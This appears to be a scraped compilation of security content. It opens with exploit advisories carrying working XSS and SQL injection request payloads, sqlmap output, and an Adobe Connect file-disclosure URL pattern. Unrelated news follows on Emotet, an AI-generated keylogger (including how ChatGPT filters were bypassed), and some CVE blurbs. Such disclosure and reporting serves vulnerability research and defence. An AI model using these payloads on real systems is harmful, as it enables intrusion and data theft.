Medicine Tracker System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Medicine Tracker System - Cross Site Scripting Vulnerability# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16308/medicine-tracker-system-php-oop-and-mysql-db-source-code-free-download.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A reflected Cross Site Scripting vulnerability in the "page" parameter in Medicine Tracker System allows to execute JavaScript code. ## Request PoC```GET /php-mts/?page=about%3cscript%3ealert(1)%3c%2fscript%3e HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-mts/Cookie: PHPSESSID=9gruivatbrq61qio77q3p7j77a```

Medicine Tracker System 1.0 Cross Site Scripting

Yoga Class Registration System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Yoga Class Registration System - Cross Site Scripting Vulnerability (Authenticated)# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip# Version: 1.0# Tested on: Windows, Linux## Description A reflected Cross Site Scripting vulnerability in the "page" parameter in Online Pizza Ordering System allows remote authenticated users to execute JavaScript code. ## Request PoC```GET /php-ycrs/admin/?page=classes%2fmanage_class58913'%3balert(1)%2f%2f575&id=2 HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-ycrs/admin/?page=classesCookie: PHPSESSID=intlfrkii1gsh9pjgeoo0dhu3b```

Yoga Class Registration System 1.0 Cross Site Scripting

Online Pizza Ordering System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Pizza Ordering System 1.0 - "id" SQLi# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the (/php-opos/index.php) page in Online Pizza Ordering System allows remote unauthenticated attackers to dump database through arbitrary SQL commands by "id" parameter. ## Request PoC```GET /php-opos/index.php?page=category&id=1' HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-opos/Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20```This request causes a Fatal Error in the webapp. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "id" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 20 command works. ```GET /php-opos/index.php?page=category&id=1'%2b(select*from(select(sleep(10)))a)%2b' HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-opos/Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/php-opos]└─# sqlmap -r sql.txt -p 'id' --batch --dbs --level=3 --risk=2---snip---[13:20:45] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectableGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: page=category&id=1' AND 9957=9957-- dMoW    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: page=category&id=1' AND (SELECT 9683 FROM(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(9683=9683,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JUhz    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=category&id=1' AND (SELECT 1462 FROM (SELECT(SLEEP(5)))HRjs)-- mEaq    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: page=category&id=-1987' UNION ALL SELECT NULL,CONCAT(0x717a6b7071,0x79716851566b7072685458534e4c6f7a75784f50614266454c7746646347794d565a43634b684958,0x716a6b7071)-- ----[13:20:45] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.54, PHP 8.2.0back-end DBMS: MySQL >= 5.0 (MariaDB fork)[13:20:45] [INFO] fetching database names[13:20:45] [INFO] retrieved: 'information_schema'[13:20:46] [INFO] retrieved: 'mysql'[13:20:46] [INFO] retrieved: 'opos_db'[13:20:46] [INFO] retrieved: 'performance_schema'[13:20:46] [INFO] retrieved: 'phpmyadmin'----snip----```

Online Pizza Ordering System 1.0 SQL Injection

Human Resources Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Human Resources Management System - HRM - Multiple SQLi# Date: 16/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip# Version: 1.0# Tested on: Windows## Description A Blind SQL injection vulnerability in the login page (/hrm/controller/login.php) in Human Resources Management System allows remote unauthenticated attackers to execute remote command through arbitrary SQL commands by "name" parameter. ## Request PoC```POST /hrm/controller/login.php HTTP/1.1Host: 192.168.1.103Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.103/hrm/Content-Type: application/x-www-form-urlencodedContent-Length: 73name=test@testdomain.com'&password=test&submit=Sign+In```This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "name" parameter, the response to request was 302 status code with message of Found, but 20 seconds later, which indicates that our sleep 20 command works. ```POST /hrm/controller/login.php HTTP/1.1Host: 192.168.1.103Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.103/hrm/Content-Type: application/x-www-form-urlencodedContent-Length: 114name=test@testdomain.com'%2b(select*from(select(sleep(20)))a)%2b'&password=test&submit=Sign+In```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/hrm]└─# sqlmap -r sqli.txt -p 'name' --batch --dbs --level=3 --risk=2---snip----[15:49:36] [INFO] testing 'MySQL UNION query (89) - 81 to 100 columns'POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:---Parameter: name (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: name=test@testdomain.com' AND 3287=(SELECT (CASE WHEN (3287=3287) THEN 3287 ELSE (SELECT 8737 UNION SELECT 2671) END))-- -&password=a5P!s3v!K8&submit=Sign In    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: name=test@testdomain.com' OR (SELECT 6958 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6958=6958,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VHwA&password=a5P!s3v!K8&submit=Sign In    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: name=test@testdomain.com' AND (SELECT 1760 FROM (SELECT(SLEEP(5)))LTmV)-- fhJt&password=a5P!s3v!K8&submit=Sign In---[15:49:36] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54, PHP----snip----```## The "password" parameter in the POST request is also vulnerable. It can be exploited in the same way.

Human Resources Management System 1.0 SQL Injection

Adobe Connect versions 11.4.5 and below as well as versions 12.1.5 and below suffer from a file disclosure vulnerability.

    # Title: adobe connect - Local File Disclosure / Download [security featurebypass vulnerability]# Author: h4shur# date:2021.01.16-2023.02.17# CVE: CVE-2023-22232# Vendor Homepage: https://www.adobe.com# Software Link: https://www.adobe.com/products/adobeconnect.html# Version: 11.4.5 and earlier, 12.1.5 and earlier# User interaction: None# Tested on: Windows 10 & Google Chrome, kali linux & firefox### Summary:Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) areaffected by an Improper Access Control vulnerability that could result in aSecurity feature bypass. An attacker could leverage this vulnerability toimpact the integrity of a minor feature.Exploitation of this issue does not require user interaction.### Description :There are many web applications in the world, each of which hasvulnerabilities due to developer errors, and this is a problem for all ofthem, and even the best of them, like the "adobe connect" program, havevulnerabilities that occur every month. They are found and fixed by theteam.* What is LFD bug?LFD bug stands for Local File Disclosure / Download, which generally allowsthe attacker to read and download files within the server, so it can beconsidered a very dangerous bug in the web world and programmers must beaware of it. Be careful and maintain security against this bug* Intruder access level with LFD bugThe level of access using this bug can be even increased to the level ofaccess to the website database in such a way that the hacker readssensitive files inside the server that contain database entry informationand enters the database and by extracting the information The admin willhave a high level of access* Identify vulnerable sitesTo search for LFD bugs, you should check the site inputs. If there is noproblem with receiving ./ characters, you can do the test to read the filesinside the server if they are vulnerable. Enter it and see if it is read ornot, or you can use files inside the server such as / etc / passwd / .. andstep by step using ../ to return to the previous path to find the passwdfile* And this time the "lfd" in "adobe connect" bug:To download and exploit files, you must type the file path in the"download-url" variable and the file name and extension in the "name"variable.You can download the file by writing the file path and file name andextension.When you have written the file path, file name and extension in the siteaddress variables, a download page from Adobe Connect will open for you,with "Save to My Computerfile name]" written in the download box and a file download link at thebottom of the download box, so you can download the file.* There are values inside the url that do not allow a file other than thisfile to be downloaded.* Values: sco_id and ticketsBut if these values are cleared, you will see that reloading is possiblewithout any obstaclesAt another address, you can download multiple files as a zip file.We put the address of the files in front of the variable "ffn" and if wewant to add the file, we add the variable "ffn" again and put the addressof the file in front of it. The "download_type" variable is also used tospecify the zip extension.### POC :https://target.com/[folder]/download?download-url=[URL]&name=[file.type]https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[basefile folder]### References:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232https://nvd.nist.gov/vuln/detail/CVE-2023-22232https://helpx.adobe.com/security/products/connect/apsb23-05.html

Adobe Connect 11.4.5 / 12.1.5 Local File Disclosure

The notorious Emotet malware, in its return after a short hiatus, is now being distributed via Microsoft OneNote email attachments in an attempt to bypass macro-based security restrictions and compromise systems.
Emotet, linked to a threat actor tracked as Gold Crestwood, Mummy Spider, or TA542, continues to be a potent and resilient threat despite attempts by law enforcement to take it down.
A

Endpoint Security / Email Security

The notorious Emotet malware, in its return after a short hiatus, is now being distributed via Microsoft OneNote email attachments in an attempt to bypass macro-based security restrictions and compromise systems.

Emotet, linked to a threat actor tracked as Gold Crestwood, Mummy Spider, or TA542, continues to be a potent and resilient threat despite attempts by law enforcement to take it down.

A derivative of the Cridex banking worm – which was subsequently replaced by Dridex around the same time GameOver Zeus was disrupted in 2014 – Emotet has evolved into a "monetized platform for other threat actors to run malicious campaigns on a pay-per-install (PPI) model, allowing theft of sensitive data and ransom extortion."

While Emotet infections have acted as a conduit to deliver Cobalt Strike, IcedID, Qakbot, Quantum ransomware, and TrickBot, its return in late 2021 was facilitated by means of TrickBot.

"Emotet is known for extended periods of inactivity, often occurring multiple times per year, where the botnet maintains a steady-state but does not deliver spam or malware," Secureworks notes in its profile of the actor.

The dropper malware is commonly distributed through spam emails containing malicious attachments. But with Microsoft taking steps to block macros in downloaded Office files, OneNote attachments have emerged as an appealing alternative pathway.

"The OneNote file is simple but yet effective at social engineering users with a fake notification stating that the document is protected," Malwarebytes disclosed in a new alert. "When instructed to double-click on the View button, victims will inadvertently double-click on an embedded script file instead."

The Windows Script File (WSF) is engineered to retrieve and execute the Emotet binary payload from a remote server. Similar findings have been echoed by Cyble, IBM X-Force, and Palo Alto Networks Unit 42.

That said, Emotet still continues to use booby-trapped documents containing macros to deliver the malicious payload, employing social engineering lures to entice users into enabling macros to activate the attack chain.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

Such documents have been observed to leverage a technique called decompression bomb to conceal a very large file (over 550 MB) within ZIP archive attachments to fly under the radar, according to multiple reports from Cyble, Deep Instinct, Hornetsecurity, and Trend Micro.

This is achieved by padding 00-byte at the end of the document to artificially inflate the file size so as to exceed the limitations imposed by anti-malware solutions.

The latest development is a sign of the operators' flexibility and agility in switching attachment types for initial delivery to evade detection signatures. It also comes amid a spike in threat actors using OneNote documents to distribute a wide range of malware such as AsyncRAT, Icedid, RedLine Stealer, Qakbot, and XWorm.

According to Trellix, a majority of the malicious OneNote detections in 2023 have been reported in the U.S., South Korea, Germany, Saudi Arabia, Poland, India, the U.K., Italy, Japan, and Croatia, with manufacturing, high-tech, telecom, finance, and energy emerging as the top targeted sectors.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Emotet Rises Again: Evades Macro Security via OneNote Attachments

Categories: News
Tags: Becky Holmes

Tags:  Lock and Code S04E06

Tags:  ransomware

Tags:  WhatsApp

Tags:  AI chatbot

Tags:  investment fraud

Tags:  Clop

Tags:  Microsoft zero-day

Tags:  Microsoft

Tags:  STALKER 2

Tags:  Facebook

Tags:  Microsoft OneNote

Tags:  LockBit

Tags:  Rubrik

The most interesting security related news from the week of March 13 to 19.



(Read more...)




The post A week in security (March 13 - 19) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (March 13 - 19)

In the Linux kernel before 6.1.3, fs/ntfs3/inode.c does not validate the attribute name offset. An unhandled page fault may occur.

CVE-2022-48424

By Deeba Ahmed
The ChatGPT-powered Blackmamba malware works as a keylogger, with the ability to send stolen credentials through Microsoft Teams.
This is a post from HackRead.com Read the original post: ChatGPT-powered polymorphic Blackmamba malware evades detection

****The malware can target Windows, macOS and Linux devices.****

HYAS Institute researcher and cybersecurity expert, Jeff Sims, has developed a new type of ChatGPT\-powered malware named Blackmamba, which can bypass Endpoint Detection and Response (EDR) filters.

This should not come as a surprise, as in January of this year, cybersecurity researchers at CyberArk also reported on how ChatGPT could be used to develop polymorphic malware. During their investigation, the researchers were able to create the polymorphic malware by bypassing the content filters in ChatGPT, using an authoritative tone.

As per the HYAS Institute’s report (PDF), the malware can gather sensitive data such as usernames, debit/credit card numbers, passwords, and other confidential data entered by a user into their device.

The ChatGPT-powered Blackmamba keylogger in action (Screenshot credit: Jeff Sims)

Once it captures the data, Blackmamba employs MS Teams webhook to transfer it to the attacker’s Teams channel, where it is “analyzed, sold on the dark web, or used for other nefarious purposes,” according to the report.

Jeff used MS Teams because it enabled him to gain access to an organization’s internal sources. Since it is connected to many other vital tools like Slack, identifying valuable targets may be more manageable.

Jeff created a polymorphic keylogger, powered by the AI-based ChatGPT, that can modify the malware randomly by examining the user’s input, leveraging the chatbot’s language capabilities.

The researcher was able to produce the keylogger in Python 3 and create a unique Python script by running the python exec() function every time the chatbot was summoned. This means that whenever ChatGPT/text-DaVinci-003 is invoked, it writes a unique Python script for the keylogger.

This made the malware polymorphic and undetectable by EDRs. Attackers can use ChatGPT to modify the code to make it more elusive. They can even develop programs that malware/ransomware developers can use to launch attacks.

Researcher’s discussion with ChatGPT

Jeff made the malware shareable and portable by employing auto-py-to-exe, a free, open-source utility. This can convert Python code into .exe files that can operate on various devices, such as macOS, Windows, and Linux systems. Additionally, the malware can be shared within the targeted environment through social engineering or email.

It is clear that as ChatGPT’s machine learning capabilities advance, such threats will continue to emerge and may become more sophisticated and challenging to detect over time. Automated security controls are not infallible, so organizations must remain proactive in developing and implementing their cybersecurity strategies to protect against such threats.

**What is Polymorphic malware?**

Polymorphic malware is a type of malicious software that changes its code and appearance every time it replicates or infects a new system. This makes it difficult to detect and analyze by traditional signature-based antivirus software because the malware appears different each time it infects a system, even though it performs the same malicious functions.

Polymorphic malware typically achieves its goal by using various obfuscation techniques such as encryption, code modification, and different compression methods. The malware can also mutate in real time by generating new code and unique signatures to evade detection by security software.

The use of polymorphic malware has become more common in recent years as cybercriminals seek new and innovative ways to bypass traditional security measures. The ability to morph and change its code makes it difficult for security researchers to develop effective security measures to prevent attacks, making it a significant threat to organizations and individuals alike.

1.  ARMO integrates ChatGPT to secure Kubernetes
2.  Scammers Pose as ChatGPT in New Phishing Scam
3.  Russian Hackers Eager to Bypass ChatGPT Restrictions

ChatGPT-powered polymorphic Blackmamba malware evades detection

A vulnerability was found in Max Secure Anti Virus Plus 19.0.2.1. It has been rated as problematic. This issue affects some unknown processing in the library MaxProctetor64.sys of the component IoControlCode Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223379.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Tag

#windows